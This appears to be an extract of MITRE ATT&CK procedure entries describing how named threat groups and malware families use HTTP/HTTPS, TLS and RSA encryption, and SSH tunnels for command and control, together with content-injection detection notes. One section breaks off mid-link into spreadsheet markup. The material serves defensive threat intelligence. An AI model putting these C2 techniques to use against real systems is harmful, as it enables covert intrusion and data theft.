[Inception](https://attack.mitre.org/groups/G0100) has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094)  has used HTTP GET and POST requests for C2.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has conducted C2 over HTTP and HTTPS.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)(Citation: ESET Twitter Ida Pro Nov 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used HTTP for C2.(Citation: Kaspersky LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used HTTP for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has used HTTP for C2.(Citation: SentinelLabs Metador Sept 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has communicated with its C2 via HTTP POST requests.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used HTTP for C2.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)
Orangeworm
[Orangeworm](https://attack.mitre.org/groups/G0071) has used HTTP for C2.(Citation: Symantec Orangeworm IOCs April 2018)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has used HTTP for C2.(Citation: Rancor Unit42 June 2018)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has executed wget and curl commands to Pastebin over the HTTPS protocol.(Citation: Anomali Rocke March 2019)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034)'s BCS-server tool connects to the designated C2 server via HTTP.(Citation: ESET Telebots Dec 2016)	
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used HTTP in C2 communications.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)
SilverTerrier
[SilverTerrier](https://attack.mitre.org/groups/G0083) uses HTTP for C2 communications.(Citation: Unit42 SilverTerrier 2018)	
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware communicates with its C2 server via HTTPS.(Citation: Citizen Lab Stealth Falcon May 2016)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used HTTP to communicate with C2 nodes.(Citation: IBM TA505 April 2020)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has used HTTP for C2 communications.(Citation: Unit 42 Valak July 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software.(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Cisco Talos Intelligence Group) [TeamTNT](https://attack.mitre.org/groups/G0139) has also used a custom user agent HTTP header in shell scripts.(Citation: Trend Micro TeamTNT)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) malware has used HTTP for C2.(Citation: Securelist LuckyMouse June 2018)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used HTTP and HTTPS for C2 communications.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTP for network communication.(Citation: Lab52 WIRTE Apr 2019)	
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used tools that communicate with C2 over HTTP.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)
3PARA RAT
[3PARA RAT](https://attack.mitre.org/software/S0066) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) has the ability to make GET requests to download files from C2.(Citation: Mandiant Suspected Turla Campaign February 2023)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can use HTTP to communicate with C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has used HTTP for C2 communications.(Citation: BlackBerry Amadey 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has sent data to its C2 server via &lt;code&gt;POST&lt;/code&gt; requests.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to communicate with C2 over HTTP.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can use HTTP to communicate with its C2 servers.(Citation: MalwareBytes SideCopy Dec 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) 
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can use HTTP/S for C2 using the Microsoft Graph API.(Citation: Volexity InkySquid BLUELIGHT August 2021) 
BUBBLEWRAP
[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using HTTP or HTTPS.(Citation: FireEye admin@338)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) uses HTTP for command and control communication.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)(Citation: DFIR Conti Bazar Nov 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014)
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) has used HTTP POST requests for C2.(Citation: MSTIC Nobelium Toolset May 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use HTTPS and HTTPS for C2 communication.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)
CHOPSTICK
Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over HTTP.(Citation: ESET Sednit Part 2)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over HTTP for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can use GET requests to download additional payloads from C2.(Citation: Cybereason Kimsuky November 2020)
Carbanak
The [Carbanak](https://attack.mitre.org/software/S0030) malware communicates to its command server using HTTP with an encrypted payload.(Citation: Kaspersky Carbanak)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has connected to C2 servers via HTTP.(Citation: Trusteer Carberp October 2010)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) can use HTTP in C2 communications.(Citation: Accenture HyperStack October 2020)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) is downloaded using HTTP over port 443.(Citation: PaloAlto CardinalRat Apr 2017)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used HTTP for C2 communications.(Citation: Cybereason Chaes Nov 2020)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can use HTTP to communicate with C2.(Citation: Check Point APT35 CharmPower January 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to communicate over HTTP.(Citation: Trend Micro DRBControl February 2020)
CloudDuke
One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: Securelist APT10 March 2021)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses HTTP for C2 communication.(Citation: Palo Alto Comnie)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke)
CozyCar
[CozyCar](https://attack.mitre.org/software/S0046)'s main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can use HTTPS for C2 using the Microsoft Graph API.(Citation: Microsoft POLONIUM June 2022)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can use HTTP for C2.(Citation: Microsoft POLONIUM June 2022)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can use a HTTP GET request to download its final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has conducted C2 communications with a Dropbox account using the HTTP API.(Citation: ESET Crutch December 2020)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can download files via HTTP and HTTPS.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use HTTPS to download files.(Citation: FireEye FiveHands April 2021)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can use HTTP or HTTPS for C2 communications.(Citation: ClearSky Lazarus Aug 2020)
Dacls
[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use HTTP in C2 communication.(Citation: SecureWorks August 2019)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) uses HTTPS for command and control.(Citation: Prevailion DarkWatchman 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)
DealersChoice
[DealersChoice](https://attack.mitre.org/software/S0243) uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has used HTTP GET and POST requests for C2.(Citation: Fortinet Diavol July 2021)
Dipsind
[Dipsind](https://attack.mitre.org/software/S0200) uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016)
Doki
[Doki](https://attack.mitre.org/software/S0600) has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20)
Donut
[Donut](https://attack.mitre.org/software/S0695) can use HTTP to download previously staged shellcode payloads.(Citation: Donut Github)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) has used both HTTP and HTTPS for C2.(Citation: DustySky)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)	 
ELMER
[ELMER](https://attack.mitre.org/software/S0064) uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has communicated with its C2 servers via HTTPS protocol.(Citation: Intrinsec Egregor Nov 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) communicates over HTTP or HTTPS for C2.(Citation: Lotus Blossom Jun 2015)
Emissary
[Emissary](https://attack.mitre.org/software/S0082) uses HTTP or HTTPS for C2.(Citation: Lotus Blossom Dec 2015)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used HTTP for command and control.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Empire
[Empire](https://attack.mitre.org/software/S0363) can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017)
Final1stspy
[Final1stspy](https://attack.mitre.org/software/S0355) uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can communicate with its C2 using HTTP.(Citation: NTT Security Flagpro new December 2021) 
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) has the ability to communicate with C2 servers over HTTP GET/POST requests.(Citation: MSTIC FoggyWeb September 2021)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use HTTP/S in C2 communications.(Citation: ESET Gelsemium June 2021)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)
Get2
[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon)
GoldFinder
[GoldFinder](https://attack.mitre.org/software/S0597) has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)	
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) uses HTTP for C2.(Citation: Talos GravityRAT)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to use HTTP for C2 communications.(Citation: Group IB GrimAgent July 2021)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)
HAMMERTOSS
The "Uploader" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) visits a hard-coded server over HTTP/S to download the images [HAMMERTOSS](https://attack.mitre.org/software/S0037) uses to receive commands.(Citation: FireEye APT29)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) can use HTTP for C2.(Citation: Palo Alto OilRig May 2016)
Hi-Zor
[Hi-Zor](https://attack.mitre.org/software/S0087) communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) has used HTTP for C2.(Citation: FireEye HIKIT Rootkit Part 2)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has used HTTPS for C2 communications.(Citation: Unit42 Emissary Panda May 2019)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can use HTTP GET to request and pull information from C2.(Citation: CrowdStrike IceApple May 2022)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used HTTPS in communications with C2.(Citation: Juniper IcedID June 2020)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604)’s main backdoor connected to a remote C2 server using HTTPS.(Citation: ESET Industroyer)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017)
KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used HTTP POST for C2.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) has used HTTP POST requests to send data to C2.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) uses HTTP and HTTPS to communicate with the C2 server. [Kazuar](https://attack.mitre.org/software/S0265) can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017)
Kevin
Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate with C2 over HTTP.(Citation: Kaspersky Lyceum October 2021)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses HTTPS for command and control.(Citation: synack 2016 review)
Kinsing
[Kinsing](https://attack.mitre.org/softwar</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for unexpected and abnormal file creations that may indicate malicious content injected through online network communications.
Network Traffic Content
Monitor for other unusual network traffic that may indicate additional malicious content transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious payloads, content obfuscation, and exploit code.
Process Creation
Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, or evidence of Discovery.
Encrypt Sensitive Information
Where possible, ensure that online traffic is appropriately encrypted through services such as trusted VPNs.
Restrict Web-Based Content
Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns.
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.(Citation: MoustachedBouncer ESET August 2023)
Disco
[Disco](https://attack.mitre.org/software/S1088) has achieved initial access and execution through content injection into DNS,  HTTP, and SMB replies to targeted hosts that redirect them to download malicious files.(Citation: MoustachedBouncer ESET August 2023)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
SSL/TLS Inspection
SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols.
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used SSL via TCP port 443 for C2 communications.(Citation: FireEye APT29 Nov 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' proxy implementation "Agent" upgraded the socket in use to a TLS socket.(Citation: FoxIT Wocao December 2019)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Group IB Cobalt Aug 2017)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used the Plink utility to tunnel RDP back to C2 infrastructure.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) used the Plink utility and other tools to create tunnels to C2 servers.(Citation: FireEye APT34 Webinar Dec 2017)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used TLS encrypted C2 communications including for campaigns using AsyncRAT.(Citation: Cisco Operation Layover September 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)
ADVSTORESHELL
A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with RSA.(Citation: Bitdefender APT28 Dec 2015)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can beacon to a hardcoded C2 IP address using TLS encryption every 5 minutes.(Citation: Gigamon BADHATCH Jul 2019)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) uses SSL for encrypting C2 communications.(Citation: Mandiant APT1 Appendix)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use TLS in C2 communications.(Citation: Zscaler Bazar September 2020)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with TLS.(Citation: ESET Sednit Part 2)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.(Citation: Talos Cobalt Strike September 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) 
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can encrypt C2 messages with AES-256-CBC sent underneath TLS. OpenSSL library functions are also used to encrypt each message using a randomly generated key and IV, which are then encrypted using a hard-coded RSA public key.(Citation: NCSC Cyclops Blink February 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can use TLS to encrypt its C2 channel.(Citation: Prevailion DarkWatchman 2021)
Doki
[Doki](https://attack.mitre.org/software/S0600) has used the embedTLS library for network communications.(Citation: Intezer Doki July 20)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RSA.(Citation: Kaspersky Dridex May 2017)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) is known to use RSA keys for encrypting C2 traffic. (Citation: Trend Micro Emotet Jan 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use TLS to encrypt its C2 channel.(Citation: Github PowerShell Empire)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses RSA.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has RSA-encrypted its communication with the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use SSL in C2 communication.(Citation: IBM Grandoreiro April 2020)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using RSA-2048.(Citation: ESET GreyEnergy Oct 2018)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can use a hardcoded server public RSA key to encrypt the first request to C2.(Citation: Group IB GrimAgent July 2021)
Hi-Zor
[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used SSL and TLS in communications with C2.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)
